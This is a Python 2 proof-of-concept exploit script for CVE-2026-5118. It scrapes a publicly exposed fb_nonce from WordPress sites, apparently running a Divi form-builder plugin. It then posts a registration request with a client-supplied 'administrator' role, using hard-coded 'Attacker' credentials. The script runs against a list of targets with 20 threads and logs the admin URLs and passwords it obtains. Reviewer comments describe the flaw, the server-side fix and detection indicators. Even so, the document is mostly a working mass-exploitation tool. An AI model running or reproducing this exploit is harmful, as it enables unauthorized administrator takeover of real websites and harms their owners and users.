POC / CVE-2026-5118.py PY
#!/usr/bin/env python2
# -*- coding: utf-8 -*-

import re
import sys
import urllib2
import threading
from Queue import Queue
import time

# ANSI escape sequences used to colour the console output.
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
RESET = '\033[0m'

# Fixed account values submitted in every registration request built by
# exploit(). Because they are hard-coded, a WordPress user with this login
# that no site owner created is an indicator that this script was run
# against the site.
DEFAULT_USERNAME = "Attacker"
DEFAULT_PASSWORD = "Attacker@123#+"
# NOTE(review): the value below is the hosting page's e-mail obfuscation
# placeholder, not an address; the original is not recoverable from this page.
DEFAULT_EMAIL    = "[email protected]" 
# Number of worker threads started by main().
THREAD_COUNT = 20
# Appended to by save_success() and read back by main() for the final count.
OUTPUT_FILE = "results.txt"

# Serialises appends to OUTPUT_FILE across the worker threads.
write_lock = threading.Lock()

def normalize_url(url):
    """Return *url* trimmed, with a scheme and without trailing slashes.

    Surrounding whitespace is stripped first; input that is empty afterwards
    yields ``None``. ``https://`` is prepended when the value does not already
    start with ``http://`` or ``https://``, and every trailing ``/`` is removed.
    """
    cleaned = url.strip()
    if cleaned == "":
        return None
    has_scheme = cleaned.startswith('http://') or cleaned.startswith('https://')
    if not has_scheme:
        cleaned = 'https://' + cleaned
    return cleaned.rstrip('/')

def extract_nonce(target_url):
    """Fetch *target_url* and return the ``fb_nonce`` value found in its HTML.

    The page is requested with a plain GET (10 second timeout, a generic
    ``Mozilla/5.0`` User-Agent) and no cookies or credentials. Several regular
    expressions are tried in order; the first capture is returned. ``None`` is
    returned when nothing matches or when any exception occurs.

    NOTE(review): because the request is anonymous, any value found here is
    one the site hands to every visitor. Such a nonce cannot serve as an
    access control for the AJAX handler it is later sent to.
    """
    try:
        req = urllib2.Request(target_url, headers={'User-Agent': 'Mozilla/5.0'})
        response = urllib2.urlopen(req, timeout=10)
        html = response.read()

        # 1) Generic `fb_nonce: "..."` / `fb_nonce = "..."` assignment.
        n = re.search(r'fb_nonce["\']?\s*[:=]\s*["\']([^"\']+)', html)
        if not n:
            # 2) Form input whose name attribute is fb_nonce.
            n = re.search(r'name=["\']fb_nonce["\'][^>]*value=["\']([^"\']+)', html)
        if not n:
            # 3) Hex value inside an inline `de_fb_obj = {...}` object.
            n = re.search(r'de_fb_obj\s*=\s*\{[^}]*"fb_nonce"\s*:\s*"([a-f0-9]+)"', html)
        if not n:
            # 4) Same object, matched across lines up to the first `};`.
            obj_match = re.search(r'de_fb_obj\s*=\s*({.*?});', html, re.DOTALL)
            if obj_match:
                obj_str = obj_match.group(1)
                n = re.search(r'"fb_nonce"\s*:\s*"([^"]+)"', obj_str)
        if not n:
            # 5) Last resort: any `"fb_nonce": "<hex>"` pair in the page.
            n = re.search(r'"fb_nonce"\s*:\s*"([a-f0-9]+)"', html)

        if n:
            return n.group(1)
        return None
    except Exception:
        # Network, HTTP and decoding errors are all reported as "no nonce".
        return None

def build_multipart_data(fields, boundary):
    """Serialise *fields* as a ``multipart/form-data`` request body.

    Each key/value pair becomes one part: the ``--boundary`` delimiter, a
    ``Content-Disposition`` header naming the field, a blank line, and the
    value converted with ``str``. The closing ``--boundary--`` delimiter and a
    trailing CRLF end the body. Parts follow the iteration order of *fields*.
    Field names and values are inserted as-is, with no escaping.
    """
    delimiter = "--" + boundary
    parts = []
    for name, value in fields.items():
        parts.extend([
            delimiter,
            'Content-Disposition: form-data; name="{}"'.format(name),
            "",
            str(value),
        ])
    parts.extend([delimiter + "--", ""])
    return "\r\n".join(parts)

def exploit(target_base, username, password, email):
    """Submit one registration request to *target_base* and guess the outcome.

    Reads the ``fb_nonce`` from the site's front page, then POSTs a multipart
    form to ``/wp-admin/admin-ajax.php``. Returns ``True`` when the lower-cased
    response contains one of several success-looking substrings. Returns
    ``False`` when no nonce was found or the request raised.

    NOTE(review): the form carries a client-supplied ``role`` field set to
    ``administrator``. The server-side handler is not shown on this page.
    Presumably the affected handler applies that role without checking the
    caller. The corresponding fix is to ignore any role supplied in the
    request and assign the site's default role server-side.

    Detection, from the request as built here: an unauthenticated POST to
    ``admin-ajax.php`` whose body has ``action=de_fb_ajax_submit_ajax_handler``
    together with a ``role`` field. This script additionally uses a fixed
    multipart boundary and a bare ``Mozilla/5.0`` User-Agent.
    """
    ajax_url = target_base + "/wp-admin/admin-ajax.php"
    nonce = extract_nonce(target_base)
    if not nonce:
        return False

    # Login, password and e-mail are each sent under two field names.
    form_data = {
        "action": "de_fb_ajax_submit_ajax_handler",
        "fb_nonce": nonce,
        "role": "administrator",
        "form_type": "register",
        "divi-form-submit": "yes",
        "de_fb_user_login": username,
        "user_login": username,
        "de_fb_user_pass": password,
        "user_pass": password,
        "de_fb_user_email": email,
        "user_email": email,
    }

    # Constant boundary: identical in every request this script sends.
    boundary = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
    body = build_multipart_data(form_data, boundary)

    # Host header is derived by stripping the scheme and any path.
    host = target_base.replace('https://', '').replace('http://', '').split('/')[0]
    headers = {
        'Host': host,
        'Content-Type': 'multipart/form-data; boundary={}'.format(boundary),
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0',
        'Content-Length': str(len(body))
    }

    try:
        req = urllib2.Request(ajax_url, data=body, headers=headers)
        resp = urllib2.urlopen(req, timeout=15)
        result = resp.read().lower()
        # Substring heuristic only: a True result does not confirm that an
        # account exists, since a generic word such as "success" also matches.
        success_strings = ["registration successful", "success", "user_id", "user created", "registered", "account created"]
        return any(s in result for s in success_strings)
    except Exception:
        # Any transport or HTTP error counts as a failed attempt.
        return False

def save_success(target, username, password):
    """Append one ``admin_url|username|password`` record to OUTPUT_FILE.

    The write happens under ``write_lock`` so that lines from different worker
    threads do not interleave. The admin URL is then printed in green. The
    record stores the password in plain text.
    """
    admin_url = target.rstrip('/') + "/wp-admin/"
    line = "{}|{}|{}\n".format(admin_url, username, password)
    with write_lock:
        # Append mode: records from earlier runs stay in the file.
        with open(OUTPUT_FILE, 'a') as f:
            f.write(line)
    print(GREEN + "[+] SUCCESS! {}".format(admin_url) + RESET)

def worker(queue, total):
    """Thread body: take entries from *queue* until none arrive for 2 seconds.

    Each entry is passed to exploit() with the module's default credentials.
    A hit is recorded through save_success(); a miss is printed in red.
    *total* is used only to compute the progress index shown in the output.
    """
    while True:
        try:
            target = queue.get(timeout=2)
        except:
            # NOTE(review): the bare except treats every exception, not only
            # an empty queue, as the signal to stop this thread.
            break
        # Progress index derived from the remaining queue size. Other threads
        # change that size concurrently, so the number is approximate.
        idx = total - queue.qsize()
        print(YELLOW + "[{}] Checking {}".format(idx, target) + RESET)
        if exploit(target, DEFAULT_USERNAME, DEFAULT_PASSWORD, DEFAULT_EMAIL):
            save_success(target, DEFAULT_USERNAME, DEFAULT_PASSWORD)
        else:
            print(RED + "[{}] FAILED  {}".format(idx, target) + RESET)
        queue.task_done()
        # Fixed half-second pause per thread between entries.
        time.sleep(0.5)

def load_targets(filepath):
    """Read *filepath* and return its non-blank lines as normalised URLs.

    Every line is stripped and passed through normalize_url(); blank lines and
    entries that normalise to nothing are skipped. If reading fails, the error
    is printed in red and the process exits with status 1.
    """
    try:
        with open(filepath, 'r') as handle:
            stripped = (entry.strip() for entry in handle)
            candidates = [normalize_url(text) for text in stripped if text]
        return [candidate for candidate in candidates if candidate]
    except Exception as e:
        print(RED + "[-] Error reading file: {}".format(e) + RESET)
        sys.exit(1)

def main():
    """Command-line entry point: ``python2 <script> list.txt``.

    Loads the list file, prints a run summary, and queues every entry. It then
    starts THREAD_COUNT daemon worker threads and waits for the queue to drain.
    Finally it counts the lines in OUTPUT_FILE and prints that as the number
    of successes.
    """
    if len(sys.argv) != 2:
        print("Usage: python2 {} list.txt".format(sys.argv[0]))
        sys.exit(1)

    targets = load_targets(sys.argv[1])
    if not targets:
        print(RED + "[-] No valid targets found." + RESET)
        sys.exit(1)


    print("[*] Total targets : {}".format(len(targets)))
    print("[*] Credentials   : {} / {}".format(DEFAULT_USERNAME, DEFAULT_PASSWORD))
    print("[*] Threads       : {}".format(THREAD_COUNT))
    print("[*] Output file   : {}\n".format(OUTPUT_FILE))

    q = Queue()
    for t in targets:
        q.put(t)

    threads = []
    for _ in range(THREAD_COUNT):
        t = threading.Thread(target=worker, args=(q, len(targets)))
        # Daemon threads do not keep the process alive after main() returns.
        t.daemon = True
        t.start()
        threads.append(t)

    # Blocks until task_done() has been called once per queued entry.
    q.join()

    # NOTE(review): OUTPUT_FILE is only ever appended to, so this count also
    # includes lines left by earlier runs. The open() call raises if the file
    # does not exist.
    with open(OUTPUT_FILE, 'r') as f:
        success = sum(1 for _ in f)
    print("\n=== DONE ===")
    print("Successful: {} / {}".format(success, len(targets)))

# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()